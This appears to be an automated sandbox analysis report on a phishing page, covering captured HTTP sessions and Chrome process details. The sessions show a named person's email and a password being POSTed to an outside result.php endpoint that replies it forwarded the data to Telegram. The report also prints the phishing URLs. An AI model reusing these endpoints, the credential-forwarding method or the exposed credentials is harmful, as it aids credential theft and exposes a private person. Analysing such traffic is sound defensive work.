                                    2025-01-23 07:05:46 UTC | 58 | IN | Data Ascii: MS-CV: BHr4wcI/0UShE20AQDvkPg.0Payload parsing failed.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    11 | 192.168.2.6 | 64999 | 184.168.29.58 | 443 | 3504 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    2025-01-23 07:05:48 UTC | 711 | OUT | POST /xzm/result.php HTTP/1.1
                                    Host: txlocksmithbellaire.com
                                    Connection: keep-alive
                                    Content-Length: 270
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAimUO6kSX1NJhj17
                                    Accept: */*
                                    Origin: https://exy77.s3.eu-central-1.amazonaws.com
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Referer: https://exy77.s3.eu-central-1.amazonaws.com/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-01-23 07:05:48 UTC | 270 | OUT | Data Ascii: ------WebKitFormBoundaryAimUO6kSX1NJhj17Content-Disposition: form-data; name="email"marco.cerullo@iprotex.de------WebKitFormBoundaryAimUO6kSX1NJhj17Content-Disposition: form-data; name="userpwd"x,&4TK7tP2^5K]l#------WebKitFormBoundaryAimUO
                                    2025-01-23 07:05:48 UTC | 204 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Thu, 23 Jan 2025 07:05:48 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Vary: Accept-Encoding
                                    2025-01-23 07:05:48 UTC | 104 | IN | Data Ascii: 5d{"email":"Email sent successfully.","telegram":"Form data sent to Telegram successfully!"}0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    12 | 192.168.2.6 | 65075 | 184.168.29.58 | 443 | 3504 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    2025-01-23 07:05:59 UTC | 711 | OUT | POST /xzm/result.php HTTP/1.1
                                    Host: txlocksmithbellaire.com
                                    Connection: keep-alive
                                    Content-Length: 270
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4CAaggzo3yWeKexH
                                    Accept: */*
                                    Origin: https://exy77.s3.eu-central-1.amazonaws.com
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Referer: https://exy77.s3.eu-central-1.amazonaws.com/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-01-23 07:05:59 UTC | 270 | OUT | Data Ascii: ------WebKitFormBoundary4CAaggzo3yWeKexHContent-Disposition: form-data; name="email"marco.cerullo@iprotex.de------WebKitFormBoundary4CAaggzo3yWeKexHContent-Disposition: form-data; name="userpwd"x,&4TK7tP2^5K]l#------WebKitFormBoundary4CAag
                                    2025-01-23 07:06:00 UTC | 204 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Thu, 23 Jan 2025 07:06:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Vary: Accept-Encoding
                                    2025-01-23 07:06:00 UTC | 104 | IN | Data Ascii: 5d{"email":"Email sent successfully.","telegram":"Form data sent to Telegram successfully!"}0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                    13 | 192.168.2.6 | 61492 | 40.113.103.199 | 443
                                    Timestamp | Bytes transferred | Direction | Data
                                    2025-01-23 07:06:06 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: EQ8V2gi0DE2gp4Bg.1Context: ead66557a767ec27
                                    2025-01-23 07:06:06 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                    2025-01-23 07:06:06 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: EQ8V2gi0DE2gp4Bg.2Context: ead66557a767ec27<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYSvAsConjQFU2UW6833kgdUuwP7tAfIAAKMsxmcIXWidz6J94do3A1/gegok4ZFLe7B65bO+z/a6tC7UYSmrOOpjB7aCwMIXr8PpcxekeQ/VX
                                    2025-01-23 07:06:06 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: EQ8V2gi0DE2gp4Bg.3Context: ead66557a767ec27<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                    2025-01-23 07:06:06 UTC | 14 | IN | Data Ascii: 202 1 CON 58
                                    2025-01-23 07:06:06 UTC | 58 | IN | Data Ascii: MS-CV: XMbbPOlb/0GshaTW8azogg.0Payload parsing failed.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    14 | 192.168.2.6 | 61506 | 184.168.29.58 | 443 | 3504 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    2025-01-23 07:06:08 UTC | 711 | OUT | POST /xzm/result.php HTTP/1.1
                                    Host: txlocksmithbellaire.com
                                    Connection: keep-alive
                                    Content-Length: 270
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryickg9CiXUT7NL2Av
                                    Accept: */*
                                    Origin: https://exy77.s3.eu-central-1.amazonaws.com
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Referer: https://exy77.s3.eu-central-1.amazonaws.com/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-01-23 07:06:08 UTC | 270 | OUT | Data Ascii: ------WebKitFormBoundaryickg9CiXUT7NL2AvContent-Disposition: form-data; name="email"marco.cerullo@iprotex.de------WebKitFormBoundaryickg9CiXUT7NL2AvContent-Disposition: form-data; name="userpwd"x,&4TK7tP2^5K]l#------WebKitFormBoundaryickg9
                                    2025-01-23 07:06:13 UTC | 204 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Thu, 23 Jan 2025 07:06:13 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Vary: Accept-Encoding
                                    2025-01-23 07:06:13 UTC | 104 | IN | Data Ascii: 5d{"email":"Email sent successfully.","telegram":"Form data sent to Telegram successfully!"}0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                    15 | 192.168.2.6 | 56914 | 40.113.103.199 | 443
                                    Timestamp | Bytes transferred | Direction | Data
                                    2025-01-23 07:06:31 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: TqYWx7H0VUa7Wr5N.1Context: d5bde02647739e9b
                                    2025-01-23 07:06:31 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                    2025-01-23 07:06:31 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: TqYWx7H0VUa7Wr5N.2Context: d5bde02647739e9b<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYSvAsConjQFU2UW6833kgdUuwP7tAfIAAKMsxmcIXWidz6J94do3A1/gegok4ZFLe7B65bO+z/a6tC7UYSmrOOpjB7aCwMIXr8PpcxekeQ/VX
                                    2025-01-23 07:06:31 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: TqYWx7H0VUa7Wr5N.3Context: d5bde02647739e9b<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                    2025-01-23 07:06:31 UTC | 14 | IN | Data Ascii: 202 1 CON 58
                                    2025-01-23 07:06:31 UTC | 58 | IN | Data Ascii: MS-CV: NyuUp6xn3kat+0corlDEBw.0Payload parsing failed.


                                    Target ID:1
                                    Start time:02:05:20
                                    Start date:23/01/2025
                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                    Imagebase:0x7ff684c40000
                                    File size:3'242'272 bytes
                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false

                                    Target ID:3
                                    Start time:02:05:22
                                    Start date:23/01/2025
                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2184,i,7140382767829794373,7643732451792572459,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                    Imagebase:0x7ff684c40000
                                    File size:3'242'272 bytes
                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false

                                    Target ID:4
                                    Start time:02:05:29
                                    Start date:23/01/2025
                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ug9n8.z1.web.core.windows.net/?lu=aHR0cHM6Ly9leHk3Ny5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9ubS5odG1sI21hcmNvLmNlcnVsbG9AaXByb3RleC5kZQ=="
                                    Imagebase:0x7ff684c40000
                                    File size:3'242'272 bytes
                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    No disassembly